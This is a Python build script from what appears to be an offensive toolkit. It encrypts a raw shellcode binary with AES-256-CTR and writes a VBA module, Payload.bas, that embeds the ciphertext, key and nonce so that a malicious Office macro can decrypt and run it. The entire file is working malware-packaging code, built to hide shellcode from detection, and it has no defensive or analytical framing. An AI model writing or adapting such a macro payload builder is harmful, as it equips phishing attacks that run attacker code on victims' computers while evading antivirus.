"""Encrypt a raw shellcode binary and emit macro/Payload.bas."""

from __future__ import annotations

import argparse
import datetime as dt
import random
import sys
from pathlib import Path

REPO_ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(REPO_ROOT))

from payload import aes  # noqa: E402

DEFAULT_OUT = REPO_ROOT / "macro" / "Payload.bas"
HEX_CHUNK_LEN = 200  # hex chars per VBA line-continuation chunk


def chunk_hex(blob: bytes, chunk_chars: int = HEX_CHUNK_LEN) -> list[str]:
    s = blob.hex()
    return [s[i:i + chunk_chars] for i in range(0, len(s), chunk_chars)] or [""]


def emit_bas(out_path: Path, encrypted: bytes, key: bytes, nonce: bytes, timestamp: str) -> None:
    chunks = chunk_hex(encrypted)
    body_lines = [f'    h = "{chunks[0]}"' + (" & _" if len(chunks) > 1 else "")]
    for i, c in enumerate(chunks[1:], 1):
        suffix = " & _" if i < len(chunks) - 1 else ""
        body_lines.append(f'        "{c}"{suffix}')
    body = "\n".join(body_lines)
    out_path.parent.mkdir(parents=True, exist_ok=True)
    out_path.write_text(
        f"""' AUTOGENERATED by payload/build.py at {timestamp} - do not edit
Option Explicit

Public Function GetEncryptedShellcode() As Byte()
    Dim h As String
{body}
    GetEncryptedShellcode = HexToBytes(h)
End Function

Public Function GetPayloadKey() As Byte()
    GetPayloadKey = HexToBytes("{key.hex()}")
End Function

Public Function GetPayloadNonce() As Byte()
    GetPayloadNonce = HexToBytes("{nonce.hex()}")
End Function
""",
        encoding="utf-8",
    )


def parse_hex_arg(s: str, expected_bytes: int, name: str) -> bytes:
    s = s.replace("0x", "").replace(" ", "").lower()
    if len(s) != expected_bytes * 2:
        raise argparse.ArgumentTypeError(
            f"{name} must be {expected_bytes} bytes ({expected_bytes * 2} hex chars), got {len(s) // 2}"
        )
    try:
        return bytes.fromhex(s)
    except ValueError as e:
        raise argparse.ArgumentTypeError(f"{name}: invalid hex - {e}")


def main(argv: list[str] | None = None) -> int:
    ap = argparse.ArgumentParser(description="Encrypt shellcode and emit Payload.bas")
    ap.add_argument("shellcode", type=Path, help="Raw shellcode binary")
    ap.add_argument("--out", type=Path, default=DEFAULT_OUT, help="Output .bas path")
    ap.add_argument("--key-hex", help="32-byte AES key as 64 hex chars (default: random)")
    ap.add_argument("--nonce-hex", help="16-byte CTR nonce as 32 hex chars (default: random)")
    ap.add_argument("--seed", type=int, help="Deterministic random seed (for CI/reproducibility)")
    ap.add_argument("--no-aes", action="store_true", help="Emit plaintext as 'encrypted' (dev/debug)")
    ap.add_argument("--validate", action="store_true", help="Round-trip check and print decrypted preview")
    args = ap.parse_args(argv)

    if not args.shellcode.exists():
        print(f"FAIL: shellcode not found: {args.shellcode}", file=sys.stderr)
        return 1
    shellcode = args.shellcode.read_bytes()
    if not shellcode:
        print("FAIL: shellcode is empty", file=sys.stderr)
        return 1

    rnd = random.Random(args.seed) if args.seed is not None else random.SystemRandom()
    if args.key_hex:
        key = parse_hex_arg(args.key_hex, 32, "--key-hex")
    else:
        key = bytes(rnd.randrange(256) for _ in range(32))
    if args.nonce_hex:
        nonce = parse_hex_arg(args.nonce_hex, 16, "--nonce-hex")
    else:
        nonce = bytes(rnd.randrange(256) for _ in range(16))

    if args.no_aes:
        encrypted = shellcode
        method = "NONE (--no-aes)"
    else:
        encrypted = aes.aes_256_ctr(shellcode, key, nonce)
        method = "AES-256-CTR"

    ts = dt.datetime.now(dt.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
    emit_bas(args.out, encrypted, key, nonce, ts)

    print(f"Wrote {args.out}")
    print(f"  method:    {method}")
    print(f"  shellcode: {len(shellcode)} bytes -> {len(encrypted)} bytes ciphertext")
    print(f"  key:       {key.hex()}")
    print(f"  nonce:     {nonce.hex()}")

    if args.validate and not args.no_aes:
        rt = aes.aes_256_ctr(encrypted, key, nonce)
        if rt != shellcode:
            print("FAIL: round-trip mismatch", file=sys.stderr)
            return 1
        print(f"  validate:  round-trip OK ({len(rt)} bytes)")
        print(f"  decrypted (first 32 bytes): {rt[:32].hex()}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
